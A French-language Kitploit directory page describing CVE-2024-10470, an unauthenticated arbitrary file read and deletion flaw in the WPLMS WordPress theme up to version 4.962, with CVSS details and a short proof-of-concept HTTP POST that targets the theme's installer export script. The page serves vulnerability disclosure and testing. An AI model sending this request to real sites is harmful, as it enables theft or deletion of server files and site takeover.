Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-10470 — WPLMS Système de gestion de l'apprentissage pour WordPress <= 4.962 – Lecture et suppression arbitraires de fichiers non authentifiées | Kitploit
Outils/GitHubGitHub/randomrobbiebf/cve-2024-10470
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubrandomrobbiebf/cve-2024-10470

CVE-2024-10470

WPLMS Système de gestion de l'apprentissage pour WordPress <= 4.962 – Lecture et suppression arbitraires de fichiers non authentifiées

Voir le dépôt
il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-10470

WPLMS Learning Management System pour WordPress <= 4.962 – Lecture et suppression de fichiers arbitraires non authentifiées

Description

Le thème WPLMS Learning Management System pour WordPress, un thème WordPress LMS, est vulnérable à la lecture et à la suppression arbitraires de fichiers en raison d'une validation insuffisante du chemin des fichiers et des vérifications de permissions dans les fonctions readfile et unlink dans toutes les versions jusqu'à la version 4.962 incluse. Cela permet à des attaquants non authentifiés de supprimer des fichiers arbitraires sur le serveur, ce qui peut facilement conduire à une exécution de code à distance lorsque le bon fichier est supprimé (comme wp-config.php). Le thème est vulnérable même lorsqu'il n'est pas activé.

root@kitploit:~
Affected Theme: WPLMS Learning Management System for WordPress
Theme Slug: wplms
Affected Versions: <= 4.962
CVE ID: CVE-2024-10470
CVSS Score: 9.8 (Critical)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Researcher/s: Foxyyy
Fully Patched Version: 4.963

POC

root@kitploit:~
POST /wp-content/themes/wplms/setup/installer/envato-setup-export.php HTTP/1.1
Host: kubernetes.docker.internal
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

download_export_zip=1&zip_file=.htaccess
Télécharger l’outil